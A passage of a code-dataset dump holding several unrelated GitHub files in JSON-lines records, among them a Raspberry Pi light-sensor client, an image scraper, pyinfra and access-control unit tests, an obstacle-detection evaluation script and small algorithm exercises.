then\n\t\tBaseClass.insert(self)\n\t\t#\n\n\t\t#\n\t\t#Return self\n\t\t#return self\n\t\t#\n\n\t@Imitater.ImitaterClass()\n\tdef retrieve(self):\n\n\t\t#debug\n\t\t'''\n\t\tself.debug(('self.',self,['RetrievingIndexesList']))\n\t\t'''\n\n\t\t#\n\t\t#retrieve first\n\t\tBaseClass.retrieve(self)\n\t\t#\n\n\t\t#Retrieve in the joined databases\n\t\tself.HierarchizedInsertIndexIntsList=map(\n\t\t\t\t\tlambda __HierarchizedRetrieveIndexesListGetStr,__HierarchizedDeriveDatabaserPointer:\n\t\t\t\t\t__HierarchizedDeriveDatabaserPointer.retrieve(\n\t\t\t\t\t\tgetattr(\n\t\t\t\t\t\t\tself.NodePointDeriveNoder,\n\t\t\t\t\t\t\t__HierarchizedRetrieveIndexesListGetStr\n\t\t\t\t\t\t)\n\t\t\t\t\t),\n\t\t\t\t\tself.HierarchizedRetrieveIndexesListGetStrsList,\n\t\t\t\t\tself.HierarchizedDeriveDatabaserPointersList\n\t\t\t\t)\n\n\t@Switcher.SwitcherClass()\n\t#@Argumenter.ArgumenterClass()\n\tdef do_hierarchize(\t\n\t\t\t\tself\n\t\t\t):\n\n\t\t#debug\n\t\t'''\n\t\tself.debug(('self.',self,['HierarchizingNodeStr']))\n\t\t'''\n\n\t\tif self.HierarchizingDatabaseNodeStr==\"\":\n\t\t\tself.HierarchizingDatabaseNodeStr=self.ModelingNodeStr\n\n\t\t#Init a default value\n\t\tif self.HierarchizingDatabaseKeyStr==\"\":\n\t\t\tself.HierarchizingDatabaseKeyStr=self.ModeledCollectionKeyStr\n\n\t\t#Check\n\t\tif self.HierarchizingNodeStr!=\"\":\n\n\t\t\t#Check\n\t\t\tif self.NodePointDeriveNoder!=None:\n\t\t\t\t\t\n\t\t\t\t#debug\n\t\t\t\t'''\n\t\t\t\tself.debug('Look for the hierarchized variables...')\n\t\t\t\t'''\n\n\t\t\t\t#set\n\t\t\t\tself.HierarchizedNodeVariablesList=self.NodePointDeriveNoder[\n\t\t\t\t\t\tNoder.NodingPrefixGetStr+self.HierarchizingNodeStr+Noder.NodingSuffixGetStr\n\t\t\t\t\t]\n\n\t\t\t\t#debug\n\t\t\t\t'''\n\t\t\t\tself.debug(('self.',self,['HierarchizedNodeVariablesList']))\n\t\t\t\t'''\n\n\t\t\t\t#set\n\t\t\t\tself.HierarchizedDeriveDatabasersList=map(\n\t\t\t\t\tlambda __HierarchizedNodeVariable:\n\t\t\t\t\tSYS._filter(\n\t\t\t\t\t\t\tlambda __NodedDatabaser:\n\t\t\t\t\t\t\tgetattr(\n\t\t\t\t\t\t\t\t__NodedDatabaser,\n\t\t\t\t\t\t\t\t'Noded'+self.HierarchizingDatabaseNodeStr+'KeyStr'\n\t\t\t\t\t\t\t\t).startswith(\n\t\t\t\t\t\t\t\tself.HierarchizingDatabaseKeyStr\n\t\t\t\t\t\t\t),\n\t\t\t\t\t\t\tgetattr(\n\t\t\t\t\t\t\t\t\t__HierarchizedNodeVariable,\n\t\t\t\t\t\t\t\t\t'Noded'+self.HierarchizingDatabaseNodeStr+'OrderedDict'\n\t\t\t\t\t\t\t).values()\n\t\t\t\t\t)[0],\n\t\t\t\t\tself.HierarchizedNodeVariablesList\n\t\t\t\t)\n\n\t\t\t\t#debug\n\t\t\t\t'''\n\t\t\t\tself.debug(('self.',self,['HierarchizedDeriveDatabasersList']))\n\t\t\t\t'''\n\n\t\t\t\t#set\n\t\t\t\tself.HierarchizedKeyStrsList=map(\n\t\t\t\t\tlambda __HierarchizedVariable:\n\t\t\t\t\tgetattr(\n\t\t\t\t\t\t__HierarchizedVariable,\n\t\t\t\t\t\tself.NodePointDeriveNoder.NodedKeyStrKeyStr\n\t\t\t\t\t),\n\t\t\t\t\tself.HierarchizedNodeVariablesList\n\t\t\t\t)\n\n\t\t\t\t#debug\n\t\t\t\t'''\n\t\t\t\tself.debug(('self.',self,['HierarchizedKeyStrsList']))\n\t\t\t\t'''\n\n\t\t\t\t#set\n\t\t\t\tself.HierarchizedRetrieveIndexesListColumnStrsList=map(\n\t\t\t\t\t\tlambda __HierarchizedKeyStr:\n\t\t\t\t\t\t'Hierarchized'+__HierarchizedKeyStr+'RetrieveIndexesList',\n\t\t\t\t\t\tself.HierarchizedKeyStrsList\n\t\t\t\t\t)\n\n\t\t\t\t#set\n\t\t\t\tself.HierarchizedRetrieveIndexesListGetStrsList=map(\n\t\t\t\t\t\tlambda __HierarchizedKeyStr:\n\t\t\t\t\t\t'Hierarchized'+self.ModelingNodeStr+self.ModeledCollectionKeyStr+'To'+__HierarchizedKeyStr+'RetrieveIndexesList',\n\t\t\t\t\t\tself.HierarchizedKeyStrsList\n\t\t\t\t\t)\n\t\t\t\t\n\t\t\t\t#debug\n\t\t\t\t'''\n\t\t\t\tself.debug(('self.',self,[\n\t\t\t\t\t\t\t\t\t\t\t'HierarchizedRetrieveIndexesListColumnStrsList',\n\t\t\t\t\t\t\t\t\t\t\t'HierarchizedRetrieveIndexesListGetStrsList'\n\t\t\t\t\t\t\t\t\t\t]))\n\t\t\t\t'''\n\n\t\t#\n\t\t#Return self\n\t\t#return self\n\t\t#\n\n\n#\n\n","repo_name":"Ledoux/ShareYourSystem","sub_path":"Pythonlogy/ShareYourSystem/Standards/Modelers/Hierarchizer/Drafts/__init__ copy.py","file_name":"__init__ copy.py","file_ext":"py","file_size_in_byte":10213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26525576812","text":"from time import sleep\nimport RPi.GPIO as GPIO\nfrom datetime import datetime\nimport config\nimport client_socket\nimport light_businesslogic\n\n#global variable to keep track the fan and light status\nis_light_on = False\n\n#create the socket conection, read the temprature data and start sending to server\ndef start_client(config):\n try:\n light_id = config.get('common', 'lightsensoridentifier')\n delay = int(config.get('client', 'lightdelay'))\n sensor_pin = int(config.get('client', 'lightsensorpin'))\n global is_light_on\n \n #repeat the sensor read after a delay\n while True: \n light_data = read_sensor_data(sensor_pin) \n \n is_low_light = light_businesslogic.check_light_level(int(light_data))\n \n if is_low_light == True:\n time = datetime.now().time()\n data = \",\".join([light_id, str(light_data), str(time)])\n\n res = client_socket.send_data(data)\n print('Light On', is_light_on)\n is_light_on = light_businesslogic.set_mode(res, is_light_on)\n \n elif is_light_on == True:\n is_light_on = light_businesslogic.set_mode(False, is_light_on)\n \n #wait for some time before sending next data\n sleep(delay)\n \n except Exception as e:\n print(f\"Error: {e}\")\n \n finally:\n sleep(delay)\n\n#Read the data from sensor\ndef read_sensor_data(sensor_pin):\n # Set BCM mode for GPIO numbering\n GPIO.setmode(GPIO.BOARD)\n \n # Setup the GPIO pin for input\n GPIO.setup(sensor_pin, GPIO.IN)\n \n # Read the sensor value\n sensor_value = GPIO.input(sensor_pin) \n \n return sensor_value \n\nif __name__ == \"__main__\":\n config = config.getconfig()\n start_client(config)","repo_name":"babars98/SmartHome","sub_path":"src/client/light_sensor_client.py","file_name":"light_sensor_client.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16512468936","text":"import requests\nimport re\nimport os\n\nif __name__ == '__main__':\n #创建文件夹\n if not os.path.exists('./糗图'):\n os.mkdir('./糗图')\n url = 'https://tieba.baidu.com/f?kw=%F4%DC%CA%C2%B0%D9%BF%C6&fr=ala0&tpl=5&dyTabStr=MCwzLDIsNiwxLDQsNSw3LDgsOQ%3D%3D'\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36 Edg/104.0.1293.54'\n }\n response = requests.get(url=url, headers=headers)\n text = response.text\n ex = ''\n imgSrc = re.findall(ex, text, re.S)\n print(imgSrc)\n\n '''\n for src in imgSrc:\n #拼接url\n src='https:'+src\n img_data=requests.get(url=src,headers=headers).content\n #生成图片名称 用/分隔开,选取倒数第一个字符串作为名字\n img_name=src.split('/')[-1]\n imgPath='./糗图'+img_name\n with open(imgPath,'wb',)as fp:\n fp.write(img_data)\n print(img_name,'ok!')\n '''\n\n\n\n\n","repo_name":"Risingrode/Python","sub_path":"爬虫/b站爬虫合集/数据解析/糗图.py","file_name":"糗图.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"70513893212","text":"import os\nimport sys\nfrom datetime import datetime\nfrom io import StringIO\nfrom unittest import TestCase\n\nimport pytest\n\nfrom pyinfra.operations import server\nfrom pyinfra_cli.commands import get_func_and_args\nfrom pyinfra_cli.exceptions import CliError\nfrom pyinfra_cli.util import json_encode\n\n\nclass TestCliUtil(TestCase):\n def test_json_encode_function(self):\n assert json_encode(get_func_and_args) == \"Function: get_func_and_args\"\n\n def test_json_encode_datetime(self):\n now = datetime.utcnow()\n assert json_encode(now) == now.isoformat()\n\n def test_json_encode_file(self):\n file = StringIO()\n assert json_encode(file) == \"In memory file: \"\n\n def test_json_encode_set(self):\n assert json_encode({1, 2, 3}) == [1, 2, 3]\n\n def test_setup_no_module(self):\n with self.assertRaises(CliError) as context:\n get_func_and_args((\"no.op\",))\n assert context.exception.message == \"No such module: pyinfra.operations.no\"\n\n def test_setup_no_op(self):\n with self.assertRaises(CliError) as context:\n get_func_and_args((\"server.no\",))\n\n assert (\n context.exception.message == \"No such attribute in module pyinfra.operations.server: no\"\n )\n\n def test_setup_op_and_args(self):\n commands = (\"pyinfra.operations.server.user\", \"one\", \"two\", \"hello=world\")\n\n assert get_func_and_args(commands) == (\n server.user,\n ([\"one\", \"two\"], {\"hello\": \"world\"}),\n )\n\n def test_setup_op_and_json_args(self):\n commands = (\"server.user\", '[[\"one\", \"two\"], {\"hello\": \"world\"}]')\n\n assert get_func_and_args(commands) == (\n server.user,\n ([\"one\", \"two\"], {\"hello\": \"world\"}),\n )\n\n\n@pytest.fixture(scope=\"function\")\ndef user_sys_path():\n user_pkg = os.path.dirname(__file__) + \"/user\"\n sys.path.append(user_pkg)\n yield None\n sys.path.pop()\n to_rm = []\n for k, v in sys.modules.items():\n v = getattr(v, \"__file__\", \"\")\n if isinstance(v, str) and v.startswith(user_pkg):\n to_rm.append(k)\n for k in to_rm:\n del sys.modules[k]\n\n\n# def test_no_user_op():\n# commands = ('test_ops.dummy_op', 'arg1', 'arg2')\n# with pytest.raises(CliError, match='^No such module: test_ops$'):\n# get_func_and_args(commands)\n\n\ndef test_user_op(user_sys_path):\n commands = (\"test_ops.dummy_op\", \"arg1\", \"arg2\")\n res = get_func_and_args(commands)\n\n import test_ops\n\n assert res == (test_ops.dummy_op, ([\"arg1\", \"arg2\"], {}))\n","repo_name":"Fizzadar/pyinfra","sub_path":"tests/test_cli/test_cli_util.py","file_name":"test_cli_util.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","stars":2300,"dataset":"github-code","pt":"32"} +{"seq_id":"17346086489","text":"from src.build import build\nfrom src.interface.interpreter import interpreter\nfrom src.database_setup import accessControlUser as acs_module\nfrom src.interface.executer import executer\nimport mock\n\nclass Test_command_list_to_str:\n\n def test_command_list_to_str(self):\n list_test = (\"test1\",\"test2\")\n\n result_str = build._command_list_to_str(list_test)\n assert result_str == \"test1 test2\"\n\nclass Test_build_list_of_packages:\n\n def test_intel_build_list_of_packages(self):\n intel_test = \"x86_64\"\n\n result = build._build_list_of_packages(intel_test)\n assert result == ['mysql-client', 'mysql-server', 'automake', 'make',\n 'python3', 'python3-pip', 'gcc', 'python3-mysqldb']\n\n def test_arm_build_list_of_packages(self):\n arm_test = \"armvl7\"\n\n result = build._build_list_of_packages(arm_test)\n assert result == ['mariadb-client', 'mariadb-server', 'automake', 'make', \n 'python3', 'python3-pip', 'gcc', 'python3-mysqldb']\n\n def test_invalid_build_list_of_packages(self):\n inv_test = \"something\"\n\n result = build._build_list_of_packages(inv_test)\n assert result == None\n\nclass Test_users_can_run:\n\n def test_user_can_run_as_root(self):\n command_test = \"root can run command written in any way\"\n user_test = acs_module.acsuser(\"\", \"\", \"root\", \"\")\n\n i = interpreter()\n i.current_user = user_test\n\n result = interpreter.user_can_run(i, command_test)\n assert result == True\n \n def test_normal_user_can_run(self):\n command_test = \"retrieve_description_from_group\"\n user_test = acs_module.acsuser(\"\", \"\", \"normal_user\", \"\")\n\n i = interpreter()\n i.current_user = user_test\n\n result = interpreter.user_can_run(i, command_test)\n assert result == True\n\n def test_normal_user_cannot_run(self):\n command_test = \"normal user cannot run commands written anyway\"\n user_test = acs_module.acsuser(\"\", \"\", \"normal_user\", \"\")\n\n i = interpreter()\n i.current_user = user_test\n\n result = interpreter.user_can_run(i, command_test)\n assert result == False\n\nclass Test_print_command_table:\n\n def test_print_command_table_as_root(self):\n user_test = acs_module.acsuser(\"\", \"\", \"root\", \"\")\n\n i = interpreter()\n i.current_user = user_test\n\n result = interpreter.print_command_table(i)\n assert result == (\"add_user_info (name, username, password, MAC)\\n\" +\n \"change_group_description (description, number)\\n\" +\n \"check_access ()\\n\" +\n \"define_new_group (number, description)\\n\" +\n \"edit_user (name, username, password, group_number, MAC)\\n\" +\n \"give_access (group_number, facility_name)\\n\" +\n \"insert_new_facility (name)\\n\" +\n \"insert_new_user (name, MAC, username, password)\\n\" +\n \"remove_access (group_number, facility_name)\\n\" +\n \"remove_facility (name)\\n\" +\n \"remove_group (number)\\n\" +\n \"remove_user (MAC, username)\\n\" +\n \"retrieve_all_users ()\\n\" +\n \"retrieve_description_from_group (number)\\n\" +\n \"retrieve_info_from_username (username)\\n\" +\n \"retrieve_my_info ()\\n\")\n\n def test_print_command_table_as_normal_user(self):\n user_test = acs_module.acsuser(\"\", \"\", \"normal_user\", \"\")\n\n i = interpreter()\n i.current_user = user_test\n\n result = interpreter.print_command_table(i)\n assert result == (\"check_access ()\\n\" +\n \"retrieve_description_from_group (number)\\n\" +\n \"retrieve_my_info ()\\n\")\n\nclass Test_parse_command:\n\n def test_parse_valid_command(self):\n command_test = \"define_new_group(number=1,description=test)\"\n\n i = interpreter()\n\n result = interpreter.parse_command(i, command_test)\n assert result == (\"define_new_group\",{\"number\":\"1\", \"description\":\"test\"})\n \n def test_parse_argless_command(self):\n command_test = \"check_access()\"\n\n i = interpreter()\n\n result = interpreter.parse_command(i, command_test)\n assert result == (\"check_access\",None)\n\nclass Test_execute_from_interpreter:\n\n def test_execute_invalid_command(self):\n command_test = \"Commands cannot be written anyway\"\n\n i = interpreter()\n\n result = interpreter.execute(i,command_test)\n assert result == (\"PARSER: Invalid command.\")\n \n def test_execute_nonexistent_command(self):\n command_test = \"unexistent_command(args_dont_matter)\"\n\n i = interpreter()\n\n result = interpreter.execute(i,command_test)\n assert result == (\"PARSER: Command does not exist.\")\n\n def test_execute_command_with_wrong_arguments(self):\n command_test = \"define_new_group(wrong_argument=any_value)\"\n\n i = interpreter()\n\n result = interpreter.execute(i,command_test)\n assert result == (\"PARSER: Wrong arguments in command.\")\n\n @mock.patch(\"src.interface.executer.executer\")\n def test_execute_valid_command(self, exc_mock):\n exc_inst = mock.MagicMock()\n exc_inst.execute.return_value = \"Mocked output\" # pretty print output\n user_test = acs_module.acsuser(\"\", \"\", \"root\", \"\")\n command_test = \"define_new_group(number=1,description=test)\" #just a valid command for parsing to complete\n \n i = interpreter()\n i.current_user = user_test\n i.command_executer = exc_inst\n \n result = interpreter.execute(i,command_test)\n assert result == (\"Mocked output\")\n\nclass Test_pretty_print:\n\n def test_valid_pretty_print(self):\n list_of_dicts_test = ( {\"1\":\"2\",\"3\":\"4\"}, {\"5\":\"6\",\"7\":\"8\"} )\n\n result = executer.pretty_print(None, list_of_dicts_test)\n assert result == \"1: 2 | 3: 4 | \\n\\n5: 6 | 7: 8 | \\n\\n\"\n \n def test_invalid_pretty_print(self):\n not_a_list_of_dicts_test = \"anything\"\n\n result = executer.pretty_print(None, not_a_list_of_dicts_test)\n assert result == \"Return from SQL querry is not printable.\"\n\nclass Test_execute_from_executer:\n\n def test_execute_command_with_errors(self):\n command_test = \"test\"\n command_table_test = {\"command\":\"not_test\"}\n\n result = executer.execute(None, None, command_test, None, command_table_test)\n assert result == 1\n \n def test_execute_root_command_as_normal_user(self):\n command_test = \"test\"\n command_table_test = {\"command\":(\"type\",\"order\")}\n user_test = acs_module.acsuser(\"\", \"\", \"normal_user\", \"\")\n\n result = executer.execute(None, user_test, command_test, None, command_table_test)\n assert result == 1\n\n @mock.patch(\"src.database_setup.dataBaseDriver.dataBaseDriver\") \n def test_execute_root_type_command_as_root(self, dbDriver_mock):\n dbDriver_inst = mock.MagicMock()\n command_test = \"retrieve_all_users\"\n command_table_test = {\"retrieve_all_users\":(\"root\",\"\")} #command type = root\n user_test = acs_module.acsuser(\"\", \"\", \"root\", \"\")\n\n e = skip_init(executer)\n e.db_driver = dbDriver_inst\n e.pretty_print=mock.Mock(return_value=\"Mocked Output\")\n\n result = e.execute(user_test, command_test, None, command_table_test)\n assert result == \"Mocked Output\"\n\n @mock.patch(\"src.database_setup.dataBaseDriver.dataBaseDriver\") \n def test_execute_acsgroup_type_command_as_root(self, dbDriver_mock):\n dbDriver_inst = mock.MagicMock()\n command_test = \"define_new_group\"\n args_test = {\"number\":1,\"description\":\"test\"}\n command_table_test = {\"define_new_group\":(\"acsgroup\",\"\")} #command type = acsgroup\n user_test = acs_module.acsuser(\"\", \"\", \"root\", \"\")\n\n e = skip_init(executer)\n e.db_driver = dbDriver_inst\n e.pretty_print=mock.Mock(return_value=\"Mocked Output\")\n\n result = e.execute(user_test, command_test, args_test, command_table_test)\n assert result == \"Mocked Output\"\n\n @mock.patch(\"src.database_setup.dataBaseDriver.dataBaseDriver\") \n def test_execute_acsuser_type_command_as_root(self, dbDriver_mock):\n dbDriver_inst = mock.MagicMock()\n command_test = \"insert_new_user\"\n args_test = {\"name\":\"test\",\"username\":\"test\",\"MAC\":\"test\",\"password\":\"test\",\"group_number\":\"teste\"}\n command_table_test = {\"insert_new_user\":(\"acsuser\",\"\")} #command type = acsuser\n user_test = acs_module.acsuser(\"\", \"\", \"root\", \"\")\n\n e = skip_init(executer)\n e.db_driver = dbDriver_inst\n e.pretty_print=mock.Mock(return_value=\"Mocked Output\")\n\n result = e.execute(user_test, command_test, args_test, command_table_test)\n assert result == \"Mocked Output\"\n \n @mock.patch(\"src.database_setup.dataBaseDriver.dataBaseDriver\") \n def test_execute_acsfacility_type_command_as_root(self, dbDriver_mock):\n dbDriver_inst = mock.MagicMock()\n command_test = \"insert_new_facility\"\n args_test = {\"name\":\"test\"}\n command_table_test = {\"insert_new_facility\":(\"acsfacility\",\"\")} #command type = acsfacility\n user_test = acs_module.acsuser(\"\", \"\", \"root\", \"\")\n\n e = skip_init(executer)\n e.db_driver = dbDriver_inst\n e.pretty_print=mock.Mock(return_value=\"Mocked Output\")\n\n result = e.execute(user_test, command_test, args_test, command_table_test)\n assert result == \"Mocked Output\"\n\n @mock.patch(\"src.database_setup.dataBaseDriver.dataBaseDriver\") \n def test_execute_acsaccess_type_command_as_root(self, dbDriver_mock):\n dbDriver_inst = mock.MagicMock()\n command_test = \"give_access\"\n args_test = {\"group_number\":\"1\", \"facility_name\":\"test\"}\n command_table_test = {\"give_access\":(\"acsaccess\",\"\")} #command type = acsaccess\n user_test = acs_module.acsuser(\"\", \"\", \"root\", \"\")\n\n e = skip_init(executer)\n e.db_driver = dbDriver_inst\n e.pretty_print=mock.Mock(return_value=\"Mocked Output\")\n\n result = e.execute(user_test, command_test, args_test, command_table_test)\n assert result == \"Mocked Output\"\n\n @mock.patch(\"src.database_setup.dataBaseDriver.dataBaseDriver\") \n def test_execute_str_type_command_as_normal_user(self, dbDriver_mock):\n dbDriver_inst = mock.MagicMock()\n command_test = \"retrieve_description_from_group\"\n args_test = {\"number\":1}\n command_table_test = {\"retrieve_description_from_group\":(\"str\",\"\")} #command type = str\n user_test = acs_module.acsuser(\"\", \"\", \"normal_user\", \"\")\n\n e = skip_init(executer)\n e.db_driver = dbDriver_inst\n e.pretty_print=mock.Mock(return_value=\"Mocked Output\")\n\n result = e.execute(user_test, command_test, args_test, command_table_test)\n assert result == \"Mocked Output\"\n\n @mock.patch(\"src.database_setup.dataBaseDriver.dataBaseDriver\") \n def test_execute_self_type_command_as_normal_user(self, dbDriver_mock):\n dbDriver_inst = mock.MagicMock()\n command_test = \"retrieve_my_info\"\n command_table_test = {\"retrieve_my_info\":(\"self\",\"\")} #command type = self\n user_test = acs_module.acsuser(\"\", \"\", \"normal_user\", \"\")\n\n e = skip_init(executer)\n e.db_driver = dbDriver_inst\n e.pretty_print=mock.Mock(return_value=\"Mocked Output\")\n\n result = e.execute(user_test, command_test, None, command_table_test)\n assert result == \"Mocked Output\"\n\n#to make it possible to test executer.execute()\ndef skip_init(cls):\n actual_init = cls.__init__\n cls.__init__ = lambda *args, **kwargs: None\n instance = cls()\n cls.__init__ = actual_init\n return instance\n \n\n \n\n","repo_name":"GGuedesAB/Access-Control-System","sub_path":"tst/test_victor.py","file_name":"test_victor.py","file_ext":"py","file_size_in_byte":12017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41400270839","text":"import utils\nimport config\nimport pandas as pd\nfrom datetime import datetime\nimport os\nimport openpyxl\n\nclass Eval3DFront:\n def __init__(self, lable_path, perce_path):\n '''初始化参数'''\n self.lable_path = lable_path\n self.perce_path = perce_path\n self.iou = config.front_config[\"iou\"]\n self.obstacle_type_3d = config.front_config[\"obstacle_type_3d\"]\n self.enum_obstacle = config.front_config[\"enum_obstacle\"]\n self.topcut = config.front_config[\"top_cut\"]\n self.top_black_edge = config.front_config[\"top_black_edge\"]\n self.bottomcut = config.front_config[\"bottom_cut\"]\n self.multiple = config.front_config[\"multiple\"]\n self.range_y = config.front_config[\"range_y\"]\n self.range_x_max_3d = config.front_config[\"range_x_max_3d\"]\n self.current_path = os.getcwd()\n self.str_time = (datetime.now()).strftime(\"%Y-%m-%d-%H-%M-%S\")\n self.excel_path = os.path.join(self.current_path,self.str_time)\n os.makedirs(self.excel_path, exist_ok=True)\n\n def proc_json_data(self):\n '''将lable列表中的json数据和perce列表中一一对应'''\n self.lable_jsons_list = utils.get_json_list(self.lable_path)\n self.perce_jsons_list_old = utils.get_json_list(self.perce_path)\n self.perce_jsons_list = []\n for lable_json in self.lable_jsons_list:\n lable_num = int(os.path.basename(lable_json).split('_')[-1].split('.')[0])\n for perce_json in self.perce_jsons_list_old:\n perce_num = int(os.path.basename(perce_json).split('.')[0])\n if lable_num==perce_num:\n self.perce_jsons_list.append(perce_json)\n if len(self.lable_jsons_list)!=len(self.perce_jsons_list):\n print('感知json数量和标注json数量不一致,请检查!')\n \n def record_detection_result(self):\n df = pd.DataFrame(columns=['frame_id','gt_type','gt_dist_x','gt_dist_y','gt_vel_x','perce_dist_x','perce_dist_y','perce_vel_x','dist_x_err','dist_y_err','vel_x_err','dist_x_err_rate','dist_y_err_rate','vel_x_err_rate'])\n m = 0 \n for i in range(len(self.lable_jsons_list)):\n frameid = os.path.basename(self.lable_jsons_list[i]).split('.')[0]\n lable_json_data = utils.get_json_data(self.lable_jsons_list[i])\n perce_json_data = utils.get_json_data(self.perce_jsons_list[i])\n lable_boxs_list = []\n lable_other_info_list = []\n perce_boxs_list = []\n perce_other_info_list = []\n if lable_json_data==[]:\n continue\n else:\n for lable_temp in lable_json_data:\n lable_box = {\"x\" : lable_temp[\"box_2d\"][\"x\"],\n \"y\" : lable_temp[\"box_2d\"][\"y\"],\n \"w\" : lable_temp[\"box_2d\"][\"w\"],\n \"h\" : lable_temp[\"box_2d\"][\"h\"]}\n lable_type = lable_temp[\"type\"]\n lable_dist_x = lable_temp[\"position\"][\"x\"]\n lable_dist_y = lable_temp[\"position\"][\"y\"]\n lable_vel_x = lable_temp[\"velocity\"][\"x\"]\n lable_boxs_list.append(lable_box)\n lable_other_info_list.append([lable_type,lable_dist_x,lable_dist_y,lable_vel_x])\n if perce_json_data==[] or perce_json_data[2][\"camera_fusion\"][\"tracks\"]==[]:\n continue\n else:\n for perce_temp in perce_json_data[2][\"camera_fusion\"][\"tracks\"]:\n perce_box = {\"x\" : perce_temp[\"uv_bbox2d\"][\"obstacle_bbox.x\"],\n \"y\" : perce_temp[\"uv_bbox2d\"][\"obstacle_bbox.y\"],\n \"w\" : perce_temp[\"uv_bbox2d\"][\"obstacle_bbox.width\"],\n \"h\" : perce_temp[\"uv_bbox2d\"][\"obstacle_bbox.height\"]}\n perce_dist_x = perce_temp[\"bbox3d\"][\"obstacle_pos_x\"]\n perce_dist_y = perce_temp[\"bbox3d\"][\"obstacle_pos_y\"]\n perce_vel_x = perce_temp[\"velocity\"][\"obstacle_rel_vel_x_filter\"]\n perce_boxs_list.append(perce_box)\n perce_other_info_list.append([perce_dist_x,perce_dist_y,perce_vel_x])\n iou_result = {}\n for j in range(len(lable_boxs_list)):\n for k in range(len(perce_boxs_list)):\n iou_result[k] = utils.bb_intersection_over_union_front(lable_boxs_list[j],perce_boxs_list[k])\n if iou_result=={}:\n continue\n iou_max_item = max(iou_result.items(), key=lambda x: x[1])\n iou_max_value = iou_max_item[1]\n iou_max_id = iou_max_item[0]\n if iou_max_value >= self.iou:\n # 横纵向误差\n dist_x_err = abs(lable_other_info_list[j][1] - perce_other_info_list[iou_max_id][0])\n dist_y_err = abs(lable_other_info_list[j][2] - perce_other_info_list[iou_max_id][1])\n vel_x_err = -1000 if lable_other_info_list[j][3]==-1000 else abs(lable_other_info_list[j][3] - perce_other_info_list[iou_max_id][2])\n # 横纵向误差率\n dist_x_err_rate = 0 if lable_other_info_list[j][1]==0 else dist_x_err/lable_other_info_list[j][1]\n dist_y_err_rate = 0 if lable_other_info_list[j][2]==0 else dist_y_err/lable_other_info_list[j][2]\n if vel_x_err==-1000:\n vel_x_err_rate = -1000\n elif lable_other_info_list[j][3]==0:\n vel_x_err_rate = 0\n else:\n vel_x_err_rate = vel_x_err/lable_other_info_list[j][3]\n\n df.loc[m,] = [frameid] + lable_other_info_list[j] + perce_other_info_list[iou_max_id] + [dist_x_err,dist_y_err,vel_x_err,dist_x_err_rate,dist_y_err_rate,vel_x_err_rate]\n m +=1\n del perce_boxs_list[iou_max_id]\n del perce_other_info_list[iou_max_id]\n df.to_excel(os.path.join(self.excel_path,'record_detection_result.xlsx'))\n \n def eval_distance(self):\n df = pd.read_excel(os.path.join(self.excel_path,'record_detection_result.xlsx'))\n df1 = pd.read_excel(os.path.join(self.excel_path,'eval_dist_result.xlsx'))\n for i in range(len(self.obstacle_type_3d)):\n obstacle_type = self.obstacle_type_3d[i]\n min_dis,mid_dis,max_dis = utils.get_dist_from_type_front(obstacle_type)\n print(df[df['gt_type']==obstacle_type])\n\n def eval_vel(self):\n pass\n\n ","repo_name":"xialinLi/kpi_eval_tool","sub_path":"eval_3d_front.py","file_name":"eval_3d_front.py","file_ext":"py","file_size_in_byte":6680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25837620072","text":"# Given an integer array, check if it contains a subarray having zero-sum.\n\n# Example:\n\"\"\"\nInput: { 3, 4, -7, 3, 1, 3, 1, -4, -2, -2 }\n \nOutput: Subarray with zero-sum exists\n \nThe subarrays with a sum of 0 are:\n \n{ 3, 4, -7 }\n{ 4, -7, 3 }\n{ -7, 3, 1, 3 }\n{ 3, 1, -4 }\n{ 3, 1, 3, 1, -4, -2, -2 }\n{ 3, 4, -7, 3, 1, 3, 1, -4, -2, -2 } \n\"\"\"\n\n\n\ndef subArrayExists(arr, n):\n\t# traverse through array\n\t# and store prefix sums\n\tn_sum = 0\n\ts = set()\n\n\tfor i in range(n):\n\t\tn_sum += arr[i]\n\n\t\t# If prefix sum is 0 or\n\t\t# it is already present\n\t\tif n_sum == 0 or n_sum in s:\n\t\t\treturn True\n\t\ts.add(n_sum)\n\n\treturn False\n\n\n# Driver code\narr = [-3, 4, -7, 3, 1, 3, 1, -4, -2, -2]\nn = len(arr)\nif subArrayExists(arr, n) == True:\n\tprint(\"Found a sunbarray with 0 sum\")\nelse:\n\tprint(\"No Such sub array exits!\")\n\n","repo_name":"Ritik-Bhola/Arrays","sub_path":"2_Check-if-a-subarray-with-0-sum-exists-or-not.py","file_name":"2_Check-if-a-subarray-with-0-sum-exists-or-not.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4587298038","text":"\"\"\"\nCreated on 05/apr/2014\n\n@author: david\n\nProblem A. Store Credit\n(https://code.google.com/codejam/contest/351101/dashboard#s=p0)\n\n\n***Problem***\n\nYou receive a credit C at a local store and would like to buy two items.\nYou first walk through the store and create a list L of all available items.\nFrom this list you would like to buy two items that add up to the entire value of the credit.\nThe solution you provide will consist of the two integers indicating the positions\nof the items in your list (smaller number first).\n\n***Input***\n\nThe first line of input gives the number of cases, N. N test cases follow. For each test case there will be:\n\n - One line containing the value C, the amount of credit you have at the store.\n - One line containing the value I, the number of items in the store.\n - One line containing a space separated list of I integers. Each integer P indicates the price of an item in the store.\n - Each test case will have exactly one solution.\n\n***Output***\n\nFor each test case, output one line containing \"Case #x: \" followed by the indices of the\ntwo items whose price adds up to the store credit. The lower index should be output first.\n\n***Limits***\n\n5 ≤ C ≤ 1000\n1 ≤ P ≤ 1000\n\n***Small dataset***\n\nN = 10\n3 ≤ I ≤ 100\n\n***Large dataset***\n\nN = 50\n3 ≤ I ≤ 2000\n\n***Sample***\n\nInput\n3\n100\n3\n5 75 25\n200\n7\n150 24 79 50 88 345 